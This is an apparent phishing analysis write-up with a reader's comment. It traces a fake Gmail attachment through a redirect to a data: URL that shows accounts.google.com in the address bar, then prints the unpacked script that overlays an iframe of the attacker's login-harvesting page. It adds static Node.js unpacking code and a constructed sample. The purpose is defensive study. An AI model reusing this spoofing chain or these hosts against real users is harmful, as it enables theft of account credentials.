The following attack will display a "you've been signed out" page for GMail, and attempt to steal your account credentials.
DO NOT PUT ANY ACCOUNT CREDENTIALS INTO ANY TABS CREATED AFTER VISITING THESE LINKS :)
I received an email in my GMail inbox with a fake attachment image, styled to look like the real GMail attachment UI:
This linked to a page that ended up displaying a fake "you've been signed out" page, served from a data:text/html URL, which Chrome renders like any other page:
The hijacked page is a fully functional copy of the Google sign-in page, including the animation, and is set up to steal passwords:
The fake attachment image linked to http://x5.to/A78
ƒ curl -vvvv http://x5.to/A78
* Trying 112.78.125.184...
* Connected to x5.to (112.78.125.184) port 80 (#0)
> GET /A78 HTTP/1.1
> Host: x5.to
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Date: Fri, 11 Mar 2016 11:38:08 GMT
< Server: Apache/2.2.31
< Location: http://bowlanreedesntal.top/services/aboutus.htm
The page the 301 lands on is nothing but a meta refresh tag that navigates the tab to a data:text/html URL. The body of that URL starts with the literal text https://accounts.google.com/ServiceLogin?service=mail (which is what the address bar then shows after the data:text/html, prefix), followed by a <script> whose src is a second, base64-encoded data: URL:
ƒ curl http://bowlanreedesntal.top/services/aboutus.htm
<meta http-equiv="Refresh" content="0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail <script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFj...></script>"
That base64 blob (labelled text/html, but loaded as a script) decodes to JavaScript obfuscated with the Dean Edwards "p,a,c,k,e,d" packer, recognisable from the eval(function(p,a,c,k,e,d){...}) wrapper at the start of the decoded text. Unpacked, it is:
// Retitle the tab so the data: page reads like Google's sign-out page.
window.document.title = "You have been Signed out";
try {
    // Install an empty favicon (a <link rel="shortcut icon"> with href '') in the head.
    (function() {
        var link = window.document.createElement('link');
        link.type = 'image/x-icon';
        link.rel = 'shortcut icon';
        link.href = '';
        document.getElementsByTagName('head')[0].appendChild(link)
    }())
} catch (e) {}
// Replace the entire body with a borderless, full-window iframe of the credential-harvesting page.
window.document.body.outerHTML = "<iframe src=\"http://bowlanreedesntal.top/services/contactus.html\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
The final result is a tab titled "You have been Signed out", with an address bar that begins with data:text/html,https://accounts.google.com/ServiceLogin?service=mail, and the fake login page filling the window inside an iframe. The tell is that data:text/html, prefix: the tab is not on accounts.google.com at all, and anything typed into the form goes to the attacker's host, not to Google.
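To pull that chain apart without executing any of it, here is an added example (my own Node.js code, not anything from the write-up or from the attacker's kit): it extracts the meta refresh target, splits the data: URL, flags the https://accounts.google.com/... text that will sit in the address bar, base64-decodes the embedded script, and unpacks the p,a,c,k,e,d wrapper by reimplementing the packer's own substitution loop instead of calling eval. Because the base64 on this page is truncated, the packed payload embedded below is a constructed one that uses the same wrapper but a short body pointing at the placeholder host phish.example; the landing HTML around it is likewise constructed in the shape of aboutus.htm.

```javascript
// Added example (not from the write-up): statically unwrap
//   meta refresh -> data:text/html -> <script src=data:...;base64> -> eval(function(p,a,c,k,e,d)...)
// without executing any attacker code. Requires Node.js (uses Buffer for base64).

// Constructed sample payload: same packer wrapper as the real one, but a short body
// that points at the placeholder host phish.example instead of the live phishing site.
const SAMPLE_PACKED =
  `eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+c.toString(a)+'\\\\b','g'),k[c])}}return p}` +
  `('0.1.2="3 4";1.5.6="<7 8=9://a.b/></7>"',36,12,'window|document|title|Signed|out|body|outerHTML|iframe|src|http|phish|example'.split('|'),0,{}))`;

// Constructed landing page in the same shape as the aboutus.htm shown above.
const SAMPLE_HTML =
  '<meta http-equiv="Refresh" content="0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail ' +
  '<script src=data:text/html;base64,' + Buffer.from(SAMPLE_PACKED).toString('base64') + '></script>">';

// Pull the URL out of a <meta http-equiv="Refresh" content="N; url=..."> tag.
// Assumes a double-quoted content attribute, as in the real sample.
function metaRefreshTarget(html) {
  const tag = html.match(/<meta[^>]*http-equiv=["']?refresh["']?[^>]*content="([^"]*)"/i);
  if (!tag) return null;
  const url = tag[1].match(/^\s*\d+\s*;\s*url\s*=\s*(.*)$/i);
  return url ? url[1].trim() : null;
}

// Split a data: URL into media type and decoded body (base64 or percent-encoded).
function parseDataUrl(url) {
  const m = url.match(/^data:([^,]*),([\s\S]*)$/i);
  if (!m) return null;
  const isBase64 = /;base64$/i.test(m[1]);
  const mediaType = m[1].replace(/;base64$/i, '') || 'text/plain';
  let data;
  if (isBase64) {
    data = Buffer.from(m[2], 'base64').toString('latin1');
  } else {
    try { data = decodeURIComponent(m[2]); } catch (e) { data = m[2]; }
  }
  return { mediaType, isBase64, data };
}

// The packer numbers its dictionary in base `base`: 0-9, a-z, then A-Z for base 62.
function packerToken(i, base) {
  const head = i < base ? '' : packerToken(Math.floor(i / base), base);
  const r = i % base;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Reimplementation of the packer's substitution loop: walk the dictionary from the
// highest index down and replace each whole-word token with its dictionary entry.
function unpackPacker(src) {
  const m = src.match(
    /eval\(function\(p,a,c,k,e,d\)[\s\S]*?\}\s*\('((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/
  );
  if (!m) return null;
  const ESC = { n: '\n', r: '\r', t: '\t' };
  const unesc = (s) => s.replace(/\\(.)/g, (_, ch) => ESC[ch] ?? ch); // undo the packer's \' and \\ escapes
  const base = Number(m[2]);
  const count = Number(m[3]);
  const words = unesc(m[4]).split('|');
  let out = unesc(m[1]);
  for (let i = count - 1; i >= 0; i--) {
    if (!words[i]) continue;                        // empty entry: token already equals its own name
    const re = new RegExp('\\b' + packerToken(i, base) + '\\b', 'g');
    out = out.replace(re, () => words[i]);          // function form so a '$' in a word stays literal
  }
  return { base, count, words, unpacked: out };
}

// Walk the whole chain and report what a victim's browser would have ended up running.
function analyzeLanding(html) {
  const report = { redirect: metaRefreshTarget(html), spoofedPrefix: null, scripts: [] };
  const page = report.redirect && parseDataUrl(report.redirect);
  if (!page) return report;
  // Text at the very start of the data: body is what shows right after "data:text/html," in the address bar.
  const spoof = page.data.match(/^\s*(https?:\/\/\S+)/);
  if (spoof) report.spoofedPrefix = spoof[1];
  const scriptRe = /<script[^>]*\ssrc=["']?([^"'\s>]+)/gi;
  let s;
  while ((s = scriptRe.exec(page.data))) {
    const inner = parseDataUrl(s[1]);
    if (!inner) { report.scripts.push({ src: s[1], code: null }); continue; }
    const packed = /^eval\(function\(p,a,c,k,e,d\)/.test(inner.data);
    const un = packed ? unpackPacker(inner.data) : null;
    report.scripts.push({ mediaType: inner.mediaType, packed, code: un ? un.unpacked : inner.data });
  }
  return report;
}

console.log(JSON.stringify(analyzeLanding(SAMPLE_HTML), null, 2));
```

The unpacker handles both packer flavours (the c.toString(a) one seen here and the base-62 one that adds A-Z), because packerToken reproduces the packer's own numbering; the argument regex only assumes the standard `}('packed',base,count,'words'.split('|')` tail, so a hand-edited wrapper would need the pattern adjusted.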
Great analysis. I just received this from someone and thought it looked fishy. Found this right away.